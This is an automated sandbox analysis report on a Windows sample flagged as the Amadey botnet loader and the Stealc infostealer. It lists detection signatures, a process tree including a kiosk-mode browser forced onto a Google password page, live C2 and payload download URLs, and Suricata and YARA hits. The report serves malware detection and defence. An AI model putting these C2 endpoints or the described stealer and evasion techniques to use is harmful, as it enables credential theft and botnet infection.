Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1502392
MD5:	573679635b5f2712201843ab58c3c313
SHA1:	4df58145fc9034226d108ab2bc3c1c3daf89432e
SHA256:	9bb28003cc59dc408c7eb6ce0acdde2df74fb0e17d0b5abc9e075bde50c90e83
Tags:	exe
Infos:

Detection

Amadey, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Found API chain indicative of debugger detection

Found API chain indicative of sandbox detection

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after accessing registry keys)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sleep loop found (likely to delay execution)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 5284 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 573679635B5F2712201843AB58C3C313)

explorti.exe (PID: 1288 cmdline: "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" MD5: 573679635B5F2712201843AB58C3C313)

explorti.exe (PID: 3624 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 573679635B5F2712201843AB58C3C313)

explorti.exe (PID: 6488 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 573679635B5F2712201843AB58C3C313)

44affe150c.exe (PID: 4592 cmdline: "C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe" MD5: 3D7BB337FEC6E0587CB2AC31BBD4780A)

4bea71e542.exe (PID: 6604 cmdline: "C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe" MD5: 3D7BB337FEC6E0587CB2AC31BBD4780A)

ca798c703b.exe (PID: 2676 cmdline: "C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe" MD5: 769C5CA33FE0D7003A0C686CDCFB9021)

msedge.exe (PID: 2684 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2092,i,10167336133317156012,1155906441156818278,262144 --disable-features=TranslateUI /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7232 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7556 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8796 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7172 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7216 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8468 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3244 --field-trial-handle=2064,i,18190485972433327417,11293936898013704625,262144 --disable-features=TranslateUI /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 9104 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7792 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3320 --field-trial-handle=3116,i,10217348870755346526,13765946174730048673,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 4592 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=2128 --field-trial-handle=3116,i,10217348870755346526,13765946174730048673,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 5340 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8224 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2168,i,13363544191728312460,15783960305069897033,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8212 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3576 --field-trial-handle=2168,i,13363544191728312460,15783960305069897033,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}

Threatname: Amadey

{"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2189503708.000000000134E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.2047827311.0000000000131000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000002.2260142696.00000000017CE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000004.00000003.2087027193.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2030799829.0000000000A31000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000003.2009107509.0000000004900000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.2007572874.0000000004940000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1990276084.0000000005200000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000004.00000002.4445450210.0000000000131000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.2049238271.0000000000131000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: 44affe150c.exe PID: 4592	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 44affe150c.exe PID: 4592	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 4bea71e542.exe PID: 6604	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 4bea71e542.exe PID: 6604	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.explorti.exe.130000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.a30000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.explorti.exe.130000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.explorti.exe.130000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Suricata Signatures

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-09-01T06:28:03.060964+0200
SID:	2856147
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-09-01T06:28:13.541306+0200
SID:	2044696
Severity:	1
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-09-01T06:28:10.229553+0200
SID:	2044243
Severity:	1
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.19 - Destination IP: 192.168.2.5

Timestamp:	2024-09-01T06:28:06.536539+0200
SID:	2856122
Severity:	1
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-09-01T06:28:04.087930+0200
SID:	2803305
Severity:	3
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-09-01T06:28:18.895756+0200
SID:	2044243
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-09-01T06:28:07.299173+0200
SID:	2044696
Severity:	1
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-09-01T06:28:09.582630+0200
SID:	2044696
Severity:	1
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-09-01T06:28:10.743444+0200
SID:	2803305
Severity:	3
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message

Source: global traffic

HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Length: 27Content-Type: text/htmlDate: Sun, 01 Sep 2024 04:29:17 GMTConnection: closePMUSER_FORMAT_QS: X-CDN-TraceId: 0.65a13617.1725164957.f4fecb3Access-Control-Allow-Credentials: falseAccess-Control-Allow-Methods: *Access-Control-Allow-Methods: GET, OPTIONS, POSTAccess-Control-Allow-Origin: *

Source: 44affe150c.exe, 00000005.00000002.2189503708.000000000134E000.00000004.00000020.00020000.00000000.sdmp, 4bea71e542.exe, 00000006.00000002.2260142696.00000000017CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100
Source: 44affe150c.exe, 00000005.00000002.2189503708.000000000134E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100%6
Source: 44affe150c.exe, 00000005.00000002.2189503708.00000000013A7000.00000004.00000020.00020000.00000000.sdmp, 4bea71e542.exe, 00000006.00000002.2260142696.0000000001825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/
Source: 44affe150c.exe, 00000005.00000002.2189503708.000000000134E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/=g
Source: 4bea71e542.exe, 00000006.00000002.2260142696.0000000001825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php
Source: 4bea71e542.exe, 00000006.00000002.2260142696.0000000001825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php/
Source: 4bea71e542.exe, 00000006.00000002.2260142696.0000000001825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php/5
Source: 44affe150c.exe, 00000005.00000002.2189503708.00000000013C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php2
Source: 44affe150c.exe, 00000005.00000002.2189503708.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php6
Source: 4bea71e542.exe, 00000006.00000002.2260142696.000000000183E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php~
Source: 4bea71e542.exe, 00000006.00000002.2260142696.0000000001825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/t
Source: 44affe150c.exe, 00000005.00000002.2189503708.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/w
Source: 4bea71e542.exe, 00000006.00000002.2260142696.0000000001825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/x
Source: 4bea71e542.exe, 00000006.00000002.2260142696.0000000001825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100E
Source: 4bea71e542.exe, 00000006.00000002.2260142696.00000000017CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100t1q
Source: explorti.exe, 00000004.00000003.2392253412.000000000141B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: explorti.exe, 00000004.00000002.4447781696.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000003.2392253412.000000000141B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe65
Source: explorti.exe, 00000004.00000002.4447781696.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000003.2392253412.000000000141B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe6522
Source: explorti.exe, 00000004.00000002.4447781696.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000003.2392253412.000000000141B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeg
Source: explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe
Source: explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000003.2392180235.000000000145B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.000000000141B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000003.2392253412.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.000000000147B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000003.2392253412.000000000141B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php#A
Source: explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php&DlR
Source: explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php-B
Source: explorti.exe, 00000004.00000003.2392155979.0000000001481000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php.
Source: explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php.ETS
Source: explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php0
Source: explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php000
Source: explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php1E_S
Source: explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php53001
Source: explorti.exe, 00000004.00000003.2392180235.000000000145B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpG
Source: explorti.exe, 00000004.00000003.2392180235.000000000145B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpG-zS
Source: explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpKBzS
Source: explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpTD
Source: explorti.exe, 00000004.00000003.2392180235.000000000145B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpW-jS
Source: explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php_BfS
Source: explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php_D
Source: explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpaB
Source: explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpkD
Source: explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phptch
Source: explorti.exe, 00000004.00000003.2392180235.000000000145B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpw
Source: explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php~D
Source: explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/d5f9dd0246b5cb4f6522427fae1daa8e9eb0eefeb8846d934f48b15eaa495c49#0
Source: explorti.exe, 00000004.00000003.2392253412.0000000001429000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000004.00000002.4447781696.0000000001429000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/fae1daa8e9eb0eefeb8846d934f48b15eaa495c49##Le
Source: ca798c703b.exe, 00000008.00000002.4446207366.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ca798c703b.exe, 00000008.00000002.4446207366.00000000016C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.c
Source: data_10.13.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=e
Source: data_10.13.dr	String found in binary or memory: https://azureedge.net
Source: Reporting and NEL.13.dr	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: Web Data.12.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Web Data.12.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Web Data.12.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data.12.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.12.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: data_10.13.dr, 000003.log7.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?assetgroup=Addre
Source: data_10.13.dr, 000003.log7.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: data_10.13.dr, 000003.log8.12.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: data_10.13.dr	String found in binary or memory: https://msn.com
Source: ca798c703b.exe, 00000008.00000002.4446165257.00000000016A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/passwordC:
Source: Web Data.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Top Sites.12.dr	String found in binary or memory: https://www.office.com/
Source: Top Sites.12.dr	String found in binary or memory: https://www.office.com/Office

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
